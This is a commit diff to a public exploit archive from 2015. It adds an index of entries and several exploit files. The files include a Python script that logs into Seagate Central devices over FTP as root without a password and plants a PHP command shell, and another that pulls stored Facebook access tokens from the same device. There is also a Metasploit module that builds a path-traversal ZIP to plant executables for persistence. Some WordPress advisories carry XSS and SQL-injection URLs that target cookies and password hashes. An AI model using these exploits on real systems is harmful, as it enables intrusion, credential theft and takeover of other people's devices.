DB: 2015-06-05

15 new exploits
2015-06-05 05:02:15 +00:00 · 2015-06-05 05:02:15 +00:00 · d811002c6b
commit d811002c6b
parent 0e74581282
16 changed files with 962 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33536,6 +33536,7 @@ id,file,description,date,author,platform,type,port
 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
 37197,platforms/windows/local/37197.py,"Jildi FTP Client 1.5.6 (SEH) BOF",2015-06-04,"Zahid Adeel",windows,local,0
 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
 37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0
 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
@ -33562,6 +33563,20 @@ id,file,description,date,author,platform,type,port
 37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 'main_page.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
 37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0
 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
 37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
 37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability",2015-06-03,Vulnerability-Lab,windows,dos,0
 37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
 37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
 37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
 37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
 37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37198,platforms/multiple/webapps/37198.rb,"JDownloader 2 Beta Directory Traversal Vulnerability",2015-06-04,PizzaHatHacker,multiple,webapps,0
 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
 37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80
--- a/platforms/hardware/dos/37199.txt
+++ b/platforms/hardware/dos/37199.txt
@ -0,0 +1,39 @@
 # Exploit Title: ZTE AC 3633R USB Modem Multiple Vulnerabilities
 # Date: 4/06/2015
 # Exploit Author: [Vishnu (@dH3wK)
 # Vendor Homepage: [http://zte.com.cn
 # Version: 3633R
 # Tested on: Windows, Linux
 Greetings from vishnu (@dH4wk)
 1. Vulnerable Product Version
 - ZTE AC3633R (MTS Ultra Wifi Modem)
 2. Vulnerability Information
 (A) Authentication Bypass
 Impact: Attacker gains administrative access
 Remotely Exploitable: UNKNOWN
 Locally Exploitable: YES
 (B) Device crash which results in reboot
 Impact: Denial of service, The crash may lead to RCE locally thus
 attaining root privilege on the device
 Remotely Exploitable: UNKNOWN
 Locally Exploitable: YES
 3. Vulnerability Description
 (A) The administrative authentication mechanism of the modem can be
 bypassed by feeding with a string of 121 characters in length, either in
 username or password field.
 (B) A crash causes the modem to restart. This is caused when either of
 the password or username fields are fed with an input of 130 characters
 or above.
 [Note: If username is targeted for exploitation, then password field shall
 be fed with minimum 6 characters (any characters) and vice versa ]
--- a/platforms/hardware/remote/37184.py
+++ b/platforms/hardware/remote/37184.py
@ -0,0 +1,71 @@
 #!/usr/bin/python
 # seagate_ftp_remote_root.py
 #
 # Seagate Central Remote Root Exploit
 #
 # Jeremy Brown [jbrown3264/gmail]
 # May 2015
 #
 # -Synopsis-
 #
 # Seagate Central by default has a passwordless root account (and no option to change it).
 # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
 # From there, we can execute commands with root privileges as lighttpd is also running as root.
 #
 # -Fixes-
 #
 # Seagate scheduled it's updates to go live on April 28th, 2015.
 #
 # Tested Firmware Version: 2014.0410.0026-F
 #
 import sys
 from ftplib import FTP
 port = 21
 php_shell = """
 <?php
 if(isset($_REQUEST['cmd']))
 {
    $cmd = ($_REQUEST["cmd"]);
    echo "<pre>$cmd</pre>";
    system($cmd);
 }
 ?>
 """
 php_shell_filename = "shell.php"
 seagate_central_webroot = "/cirrus/"
 def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host>" % sys.argv[0])
        return
    host = sys.argv[1]
    try:
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)
    except Exception as error:
        print("Error: %s" % error);
        return
    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()
    except Exception as error:
        print("Error: %s" % error);
        return
    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
    return
 if __name__ == "__main__":
    main()
--- a/platforms/hardware/webapps/37185.py
+++ b/platforms/hardware/webapps/37185.py
@ -0,0 +1,116 @@
 #!/usr/bin/python
 # seagate_central_facebook.py
 #
 # Seagate Central Remote Facebook Access Token Exploit
 #
 # Jeremy Brown [jbrown3264/gmail]
 # May 2015
 #
 # -Synopsis-
 #
 # Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
 # and this exploit takes advantage of two bugs:
 #
 # 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
 # 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
 #
 # -Example-
 #
 # > seagate_fb_accounts.py getaccesstoken 1.2.3.4
 #
 # 'archive_accounts.ser'
 #
 # a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4:
 # "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
 # oken";s:186:"CAAxxxxxxxx..."
 # ;}}}
 #
 # Next, try this:
 #
 # > seagate_fb_accounts.py CAAxxxxxxxx... friends
 # server response:
 #
 # {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
 # 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
 # : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
 # .....
 #
 # Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
 #
 # -Fixes-
 #
 # Seagate scheduled updates to go live on April 28th, 2015.
 #
 # Tested version: 2014.0410.0026-F
 #
 import sys
 import json
 from urllib import request # python3
 from ftplib import FTP
 fb_url = "https://graph.facebook.com"
 fb_filename = "archive_accounts.ser"
 def getaccesstoken(host):
    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
        ftp.close()
    except Exception as error:
        print("Error: %s" % error)
        return
    try:
        with open(fb_filename, 'r') as file:
            data = file.read()
    except Exception as error:
        print("Error: %s" % error)
        return
    print("\n'%s'\n\n%s\n\n" % (fb_filename, data))
    return
 def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
        print("scopes: albums feed friends likes picture posts television")
        return
    if(sys.argv[1] == "getaccesstoken"):
        if(len(sys.argv) == 3):
            host = sys.argv[2]
            res = getaccesstoken(host)
        else:
            print("Error: need host to retrieve access token file\n")
            return
    else:
        key = sys.argv[1]
        if(len(sys.argv) == 3):
            scope = sys.argv[2]
        else:
            scope = ""
        try:
            response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()
        except Exception as error:
            print("Error: %s" % error)
            return
        data = json.loads(response.decode('utf-8'))
        print("server response:\n\n%s\n" % data)
    return
 if __name__ == "__main__":
    main()
--- a/platforms/multiple/webapps/37198.rb
+++ b/platforms/multiple/webapps/37198.rb
@ -0,0 +1,263 @@
 =begin
 # Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
 # Date: 2015-06-02
 # Exploit Author: PizzaHatHacker
 # Vendor Homepage: http://jdownloader.org/home/index
 # Software Link: http://jdownloader.org/download/offline
 # Version: 1171 <= SVN Revision <= 2331
 # Contact: PizzaHatHacker[a]gmail[.]com
 # Tested on: Windows XP SP3 / Windows 7 SP1
 # CVE: 
 # Category: remote
 1. Product Description
 Extract from the official website :
 "JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"
 2. Vulnerability Description & Technical Details
 JDownloader 2 Beta is vulnerable to a directory traversal security issue.
 Class : org.appwork.utils.os.CrossSystem
 Method : public static String alleviatePathParts(String pathPart)
 This method is called with a user-provided path part as parameter,
 and should return a valid and safe path where to create a file/folder.
 This method first checks that the input filepath does not limit
 itself to a (potentially dangerous) sequence of dots and otherwise 
 removes it :
 pathPart = pathPart.replaceFirst("\\.+$", "");
 However right after this, the value returned is cleaned from
 starting and ending white space characters :
 return pathPart.trim();
 Therefore, if you pass to this method a list of dots followed by some white space
 like "..  ", it will bypass the first check and then return the valid path ".."
 which is insecure.
 This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
 then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) 
 would cause JD2b to overwrite/create arbitrary files on the target filesystem.
 3. Impact Analysis :
 To exploit this issue, the victim is required to launch a standard ZIP file download.
 The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
 automatically be extracted.
 By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
 files on the target file system.
 Therefore, it is possible to take the control of the victim's machine with the rights of
 the JDownloader process - typically standard (non-administrator) rights - for example by
 overwriting existing executable files, by uploading an executable file in a user's
 autorun directory etc.
 4. Common Vulnerability Scoring System
 * Exploitability Metrics
 - Access Vector (AV) : Network (AV:N)
 - Access Complexity (AC) : Medium (AC:M)
 - Authentication (Au) : None (Au:N)
 * Impact Metrics
 - Confidentiality Impact (C) : Partial (C:P)
 - Integrity Impact (I) : Partial (I:P)
 - Availability Impact (A) : Partial (A:P)
 * CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
 - CVSS Base Score : 6.8
 - Impact Subscore 6.4
 - Exploitability Subscore 8.6
 5. Proof of Concept
 - Create a ZIP file with an entry like ".. /poc.txt"
 - Upload it to an HTTP server (for example)
 - Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
 - JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory
 OR see the Metasploit Exploit provided.
 6. Vulnerability Timeline
 2012-04-27 : Vulnerability created (SVN Revision > 1170)
 2014-08-19 : Vulnerability identified
 [...]      : Sorry, I was not sure how to handle this and forgot about it for a long time
 2015-05-08 : Vendor informed about this issue
 2015-05-08 : Vendor response + Code modification (Revision 2332)
 2015-05-11 : Code modification (SVN Revision 2333)
 2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
 2015-05-12 : Code modification (SVN Revision 2335)
 2015-05-12 : Confirmed to the vendor that the code looks now safe
 2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
 2015-06-04 : Disclosure of this document
 7. Solution
 Update JDownloader 2 Beta to the latest version.
 8. Personal Notes
 I am NOT a security professional, just a kiddy fan of security.
 I was boring so I looked for some security flaws in some software and happily found this.
 If you have any questions/remarks, don't hesitate to contact me by email.
 I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-)
 =end
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'rex'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'JDownloader 2 Beta Directory Traversal Vulnerability',
      'Description'   => %q{
        This module exploits a directory traversal flaw in JDownloader 2 Beta 
        when extracting a ZIP file (which by default is automatically done by JDL).
        The following targets are available :
        Windows regular user : Create executable file in the 'Start Menu\Startup'
        under the user profile directory. (Executed at next session startup).
        Linux regular user : Create an executable file and a .profile script calling
        it in the user's home directory. (Executed at next session login).
        Windows Administrator : Create an executable file in C:\\Windows\\System32
        and a .mof file calling it. (Executed instantly).
        Linux Administrator : Create an executable file in /etc/crontab.hourly/.
        (Executed within the next hour).
 		Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
      'References'    =>
      [
        [ 'URL', 'http://jdownloader.org/download/offline' ],
      ],
      'Platform'      => %w{ linux osx solaris win },
      'Payload'       => {
        'Space' => 20480, # Arbitrary big number
        'BadChars' => '',
        'DisableNops' => true
    },
      'Targets'       =>
        [
          [ 'Windows Regular User (Start Menu Startup)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
              'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
              'Option'       => nil,
            }
          ],
          [ 'Linux Regular User (.profile)',
            {
              'Platform'     => 'linux',
              'Depth'        => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
              'RelativePath' => '',
              'Option'       => 'profile',
            }
          ],
          [ 'Windows Administrator User (Wbem Exec)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'Windows/System32/',
              'Option'       => 'mof',
            }
          ],
          [ 'Linux Administrator User (crontab)',
            {
              'Platform'  => 'linux',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'etc/cron.hourly/',
              'Option'       => nil,
            }
          ],
        ],
      'DefaultTarget'  => nil,
      'DisclosureDate' => ''
      ))
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', '']),
         # C:\Users\Bob\Downloads\XXX\xxx.zip  => 4
         # /home/Bob/Downloads/XXX/xxx.zip     => 4
         OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
      ], self.class)
 register_advanced_options(
   [
     OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
   ], self.class)
  end
  # Traversal path
  def traversal(depth)
    result = '.. /'
    if depth < 0
      # Go up n levels
      result = result * -depth
    else
      # Go up until n-th level
      result = result * (datastore['DEPTH'] - depth)
    end
    return result
  end
  def exploit
    # Create a new archive
    zip = Rex::Zip::Archive.new
    # Optionally include an initial directory
    dir = datastore['INCLUDEDIR']
    if not dir.nil? and not dir.empty?
      print_status("Filling archive recursively from path #{dir}")
      zip.add_r(dir)
    end
    # Create the payload executable file path
    exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
    exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name
    # Generate the payload executable file content
    exe_content = generate_payload_exe()
    # Add the payload executable file into the archive
    zip_add_file(zip, exe_file, exe_content)
    # Check all available targets
    case target['Option']
    when 'mof'
      # Create MOF file data
        mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
        mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
        mof_content = generate_mof(mof_name, exe_name)
        zip_add_file(zip, mof_file, mof_content)
    when 'profile'
      # Create .profile file
      bashrc_name = '.profile'
      bashrc_file = traversal(target['Depth']) + bashrc_name
      bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
      zip_add_file(zip, bashrc_file, bashrc_content)
    end
    # Write the final ZIP archive to a file
    zip_data = zip.pack
    file_create(zip_data)
  end
  # Add a file to the target zip and output a notification
  def zip_add_file(zip, filename, content)
    print_status("Adding '#{filename}' (#{content.length} bytes)");
    zip.add_file(filename, content, nil, nil, nil)
  end
 end
--- a/platforms/php/webapps/37189.txt
+++ b/platforms/php/webapps/37189.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/53524/info
 Media Library Categories plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Media Library Categories 1.1.1 is vulnerable; other versions may also be affected.
 http://www.example.com/wp-admin/admin.php?page=media-library-categories/add.php&bulk=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E&attachments=1
 http://www.example.com/wp-admin/upload.php?page=media-library-categories/view.php&q='><script>alert(1)</script> 
--- a/platforms/php/webapps/37190.txt
+++ b/platforms/php/webapps/37190.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/53525/info
 LeagueManager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 LeagueManager 3.7 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=leaguemanager&amp;subpage=show-league&amp;league_id=1&amp;group=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
 http://www.example.com/wp-admin/admin.php?page=leaguemanager&amp;subpage=team&amp;edit=1&amp;season=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 
--- a/platforms/php/webapps/37191.txt
+++ b/platforms/php/webapps/37191.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53526/info
 The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Leaflet 0.0.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=leaflet_layer&amp;id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 
--- a/platforms/php/webapps/37192.txt
+++ b/platforms/php/webapps/37192.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53526/info
 The Leaflet plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Leaflet 0.0.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=leaflet_marker&amp;id=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt; 
--- a/platforms/php/webapps/37193.txt
+++ b/platforms/php/webapps/37193.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53527/info
 The GD Star Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 GD Star Rating 1.9.16 is vulnerable; other versions may also be affected.
 http://www.example.com/wp-admin/admin.php?page=gd-star-rating-t2 tpl_section=&lt;script&gt;alert(1)&lt;/script&gt;&amp;gdsr_create=Create
--- a/platforms/php/webapps/37194.txt
+++ b/platforms/php/webapps/37194.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/53529/info
 The Mingle Forum plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Mingle Forum 1.0.33 is vulnerable; other versions may also be affected.
 http://www.example.com/wp-admin/admin.php?page=mfstructure&amp;mingleforum_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 http://www.example.com/wp-admin/admin.php?page=mfgroups&amp;mingleforum_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id=1%27%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
--- a/platforms/php/webapps/37195.txt
+++ b/platforms/php/webapps/37195.txt
@ -0,0 +1,15 @@
 source: http://www.securityfocus.com/bid/53530/info
 WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 WP Forum Server 1.7.3 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
 http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
 http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1
 http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; 
--- a/platforms/php/webapps/37196.txt
+++ b/platforms/php/webapps/37196.txt
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/53531/info
 Pretty Link Lite plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Pretty Link Lite 1.5.2 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-content/plugins/pretty-link/pretty-bar.php?url="><script>alert(document.cookie);</script>
 http://www.example.com/wp-content/plugins/pretty-link/prli-bookmarklet.php?k=c69dbe5f453820a32b0d0b0bb2098d3d&target_url=%23"><script>alert(document.cookie);</script><a name="
 http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&action=csv&l=1%20and%201=0%20UNION%20SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID=1
--- a/platforms/php/webapps/37200.txt
+++ b/platforms/php/webapps/37200.txt
@ -0,0 +1,38 @@
 # Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register
 Plugin [Local File Inclusion]
 # Date: 2015/06/01
 # Exploit Author: Panagiotis Vagenas
 # Contact: https://twitter.com/panVagenas
 # Vendor Homepage: http://zanematthew.com/
 # Software Link:
 https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip
 # Version: 1.0.9
 # Tested on: WordPress 4.2.2
 # Category: webapps
 # CVE: CVE-2015-4153
 * Description
 Any authenticated or non-authenticated user can perform a local file
 inclusion attack by exploiting the wp_ajax_nopriv_load_template action.
 Plugin simply includes the file specified in 'template' POST parameter
 without any further validation.
 * Proof of Concept
 Send a post request to
 `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
 `action=load_template&template=[relative path to local
 file]&security=[wp nonce]&referer=[action from which the nonce came from]`
 * Timeline
 2015/06/01 Discovered
 2015/06/01 Vendor alerted via contact form at his website
 2015/06/03 Vendor responded
 2015/06/03 Fixed in version 1.1.0
 * Solution
 Update to version 1.1.0
--- a/platforms/windows/dos/37188.txt
+++ b/platforms/windows/dos/37188.txt
@ -0,0 +1,273 @@
 Document Title:
 ===============
 WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability
 References (Source):
 ====================
 http://www.vulnerability-lab.com/get_content.php?id=1500
 Release Date:
 =============
 2015-06-01
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1500
 Common Vulnerability Scoring System:
 ====================================
 6.8
 Product & Service Introduction:
 ===============================
 Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. 
 Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and 
 Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the 
 full-function 20-day trial of WebDrive and  make file management on remote servers easier and more efficient!
 (Copy of the Vendor Homepage: http://www.webdrive.com/products/webdrive/ )
 Abstract Advisory Information:
 ==============================
 An independent vulnerability laboratory researcher discovered an unicode buffer overflow vulnerability in the official WebDrive v12.2 (Build 4172) 32 bit software.
 Vulnerability Disclosure Timeline:
 ==================================
 2015-06-01: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 South River Technologies
 Product: WebDrive - Software 12.2 (Build 4172) 32 bit
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 High
 Technical Details & Description:
 ================================
 A buffer overflow software vulnerability has been discovered  in the official WebDrive v12.2 (Build 4172) 32 bit software.
 The buffer overflow vulnerability allows to include unicode strings to basic code inputs from a system user account to compromise the software process or system.
 A fail to sanitize the input of the URL/Address results in compromise of the software system process. Attackers are able to 
 include large unicode strings to overwrite the registers like eip, ebp and co. WebDrive connects to many types of web servers, 
 as well as servers in the cloud. You can use WebDrive to access your files on all of the following server types and protocols:
 WebDAV ------------>Vulnerable
 WebDAV over SSL---->Vulnerable
 FTP---------------->Vulnerable
 FTP over SSL------->Vulnerable
 Amazon S3---------->Vulnerable
 SFTP--------------->Vulnerable
 FrontPage Server--->Vulnerable
 The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. 
 Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability 
 results in system compromise by elevation of privileges via overwrite of the registers.
 Vulnerable Module(s):
 						[+] URL/Address
 Note: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. 
 Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and 
 maps a drive letter to each of these servers.You can map unique drive letters to multiple servers. Download the full-function 20-day trial of WebDrive and 
 make file management on remote servers easier and more efficient!
 Proof of Concept (PoC):
 =======================
 The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and without user interaction.
 For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 Manual steps to reproduce the vulnerability ...
 1. Copy the AAAA...string from WebDrive.txt to clipboard
 2. Create a connection 
 3. Paste it in the URL/Address and attempt to connect.
 --- Crash Analysis using WinDBG: [WebDAV] ---
 (430.9f8): Access violation - code c0000005 (!!! second chance !!!)
 eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
 eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0         nv up ei pl nz na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
 webdrive+0x30ff2b:
 0055ff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:001d1000=????
